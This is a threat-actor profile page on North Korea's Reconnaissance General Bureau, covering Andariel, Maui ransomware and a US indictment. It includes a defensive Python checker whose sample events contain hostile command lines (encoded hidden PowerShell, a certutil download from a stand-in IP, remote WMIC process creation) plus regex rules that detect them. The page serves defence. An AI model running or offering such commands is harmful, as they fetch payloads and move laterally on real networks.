Rgb

Threat Actor updated 24 days ago (2024-08-14T10:18:11.585Z)
RGB here refers to North Korea's Reconnaissance General Bureau (RGB), the regime's primary foreign intelligence service, which oversees most of its state-sponsored cyber operations. The RGB 3rd Bureau, based in Pyongyang and Sinuiju, houses the cyber unit tracked by vendors as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. These actors deploy custom malware, including the Maui ransomware used to encrypt and extort ransom payments from U.S. healthcare entities. A U.S. indictment charges Rim Jong Hyok, an operative working for the RGB, with participating in these operations and alleges that the laundered ransom proceeds were used to fund further espionage activity.

In response, the U.S. Federal Bureau of Investigation (FBI) and its authoring partners released a cybersecurity advisory. Its recommended mitigations include monitoring for suspicious command-line activity, requiring multi-factor authentication for remote access services, and segmenting critical assets and protecting them with application allow-listing tools. The RGB remains an active threat; organizations in the defense, aerospace, nuclear and engineering sectors, as well as healthcare providers, should remain vigilant in defending their networks.

Several of the source documents listed below match this profile on the string "RGB" only by name collision and do not describe this threat actor: RGB-D and RGB-Infrared (IR) cross-modality person re-identification (re-ID), together with the finding that such systems are highly vulnerable to adversarial patch attacks despite expectations that depth data would make them more robust, is a computer-vision research topic; pixel-hiding steganography, which becomes dangerous only when a program on the victim host extracts and executes the concealed code, is a general malware-concealment technique that neither the advisory nor the indictment attributes to this group; and RGB-TEAM, a Russian-speaking hacktivist group that claimed to have breached Russia's prosecutor general's website and leaked criminal records, is unrelated to the DPRK's RGB.
Description last updated: 2024-08-14T09:36:29.989Z
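As an added illustration of two of the advisory's mitigations above, monitoring for suspicious command-line activity and allow-listing on segmented critical assets, here is a small Python checker run over constructed process-creation events. This is example code written for this page, not code from the advisory, the indictment, or any vendor product; the detection rules (encoded or hidden-window PowerShell, certutil downloads, WMIC remote process creation), the host names and the per-host allow-list are assumptions chosen for illustration, not indicators published for this group.

```python
import json
import re
from typing import Dict, List, Set

# Constructed sample process-creation events, in the shape an EDR or Sysmon
# Event ID 1 export might produce. These are NOT indicators from the advisory.
SAMPLE_EVENTS = [
    {"host": "hr-ws-01", "user": "j.doe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\j.doe\\notes.txt"},
    {"host": "hr-ws-01", "user": "j.doe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "fileserver-03", "user": "svc_backup",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/upd.dat C:\\ProgramData\\upd.dat"},
    {"host": "ot-hmi-02", "user": "operator",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": 'wmic /node:10.0.5.7 process call create "cmd.exe /c whoami"'},
    {"host": "ot-hmi-02", "user": "operator",
     "image": "C:\\Vendor\\HMI\\hmi.exe",
     "cmdline": "hmi.exe --project line1"},
]

# Assumed command-line rules: (rule name, regex over the full command line).
SUSPICIOUS_CMDLINE_RULES = [
    ("encoded_powershell",
     re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_powershell_window",
     re.compile(r"powershell(\.exe)?\b.*\s-w(indowstyle)?\s+hidden", re.I)),
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("wmic_remote_process_create",
     re.compile(r"wmic(\.exe)?\b.*/node:.*process\s+call\s+create", re.I)),
]

# Assumed allow-list for segmented critical assets: on these hosts only the
# listed images are expected to run; anything else is an allow-list violation.
CRITICAL_ASSET_ALLOWLIST: Dict[str, Set[str]] = {
    "ot-hmi-02": {"C:\\Vendor\\HMI\\hmi.exe", "C:\\Windows\\explorer.exe"},
}


def check_cmdline(cmdline: str) -> List[str]:
    """Return the names of every suspicious-command-line rule that matches."""
    return [name for name, rx in SUSPICIOUS_CMDLINE_RULES if rx.search(cmdline)]


def check_allowlist(host: str, image: str) -> bool:
    """True only if host is a critical asset and image is not on its allow-list."""
    allowed = CRITICAL_ASSET_ALLOWLIST.get(host)
    if allowed is None:
        return False  # not a critical asset: allow-listing is not enforced here
    return image.lower() not in {a.lower() for a in allowed}


def triage(events) -> List[dict]:
    """Return one alert per event that trips a command-line rule or the allow-list."""
    alerts = []
    for ev in events:
        reasons = check_cmdline(ev["cmdline"])
        if check_allowlist(ev["host"], ev["image"]):
            reasons.append("allowlist_violation")
        if reasons:
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "reasons": reasons, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    # Against the constructed sample, three of the five events raise alerts.
    for alert in triage(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

The allow-list check deliberately fires only on hosts that are declared critical assets; workstations outside the segmented zone are covered by the command-line rules alone, which keeps the allow-list from generating noise where it is not enforced.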
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
Andariel (5 votes): Andariel, a state-backed threat group linked to North Korea's Reconnaissance General Bureau, has been identified as a significant cyber threat. The group has demonstrated its capabilities by compromising critical national infrastructure organizations, accessing classified technical information and i
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Reconnaissance
Korean
State Sponso...
Malware
Ransomware
Jumpcloud
Espionage
Mandiant
Exploits
Dprk
Associated Threat Actors
Kimsuky (type: Unspecified, 2 votes): Kimsuky, also known as Springtail, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43, is a North Korea-linked threat actor first identified by a Kaspersky researcher in 2013. This cyberespionage group has been associated with various malicious activities, including spear-phishing camp
APT38 (type: Unspecified, 2 votes): APT38, also known as TA444, BlueNoroff, BlackAlicanto, Copernicium, Sapphire Sleet, and Stardust Chollima, is a North Korea-linked advanced persistent threat (APT) group. It has conducted operations in over 16 organizations across at least 11 countries, primarily targeting financial institutions wor
Bluenoroff (type: Unspecified, 2 votes): BlueNoroff, a threat actor closely associated with the notorious Lazarus Group, has been actively involved in malicious cyber activities primarily targeting financial institutions and cryptocurrency businesses. Known for its sophisticated attacks on banks, casinos, fintech companies, POST software,
temp.hermit (type: Unspecified, 2 votes): Temp.Hermit, also known as Lazarus Group or Hidden Cobra, is a threat actor group associated with North Korea's Reconnaissance General Bureau (RGB). The group has been operational since 2013 and is known for its cyberespionage activities targeting governments and sectors such as defense, telecommuni
Lazarus Group (type: Unspecified, 2 votes): The Lazarus Group, a notorious threat actor associated with North Korea, has been implicated in several high-profile cyber attacks and exploitation activities. The group's objective often involves establishing a kernel read/write primitive, which allows them to gain high-level access to systems and
Apt43 (type: Unspecified, 2 votes): APT43, also known as Kimsuky, is a North Korean state-sponsored advanced persistent threat (APT) group that has been actively involved in cybercrime and espionage. The group has been implicated in a series of attacks exploiting vulnerabilities, which have drawn the attention of various cybersecurity
Source Document References
Information about the Rgb Threat Actor was read from the documents corpus below. This display is limited to 20 results.
Flashpoint (a month ago): COURT DOC: North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers
CISA (a month ago): North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA
ESET (5 months ago): Malware hiding in pictures? More likely than you think
Checkpoint (5 months ago): 8th April – Threat Intelligence Report - Check Point Research
CERT-EU (6 months ago): Hackaday Podcast Episode 261: Rickroll Toothbrush, Keyboard Cat, Zombie Dialup
CERT-EU (6 months ago): Search | arXiv e-print repository
CERT-EU (6 months ago): Chinese PC-maker Acemagic's machines infected with malware
CERT-EU (6 months ago): Search | arXiv e-print repository
DARKReading (7 months ago): Critical ConnectWise RMM Bug Poised for Exploitation Avalanche
CERT-EU (8 months ago): Search | arXiv e-print repository
CERT-EU (10 months ago): Search | arXiv e-print repository
CERT-EU (a year ago): Search | arXiv e-print repository
CERT-EU (a year ago): Search | arXiv e-print repository
CERT-EU (8 months ago): Search | arXiv e-print repository
CERT-EU (9 months ago): Content Protection Market to grow by USD 1.03 billion from 2023 to 2028 | Market is fragmented due to the presence of prominent companies like Adobe Inc., Alphabet Inc. and Cisco Systems Inc., and many more - Technavio
CERT-EU (9 months ago): Search | arXiv e-print repository
CERT-EU (9 months ago): Search | arXiv e-print repository
CERT-EU (9 months ago): Search | arXiv e-print repository
CERT-EU (9 months ago): Mini Meters Monitor Microprocessor Maximization
CERT-EU (9 months ago): U.S. government sanctions prolific North Korean cyber espionage unit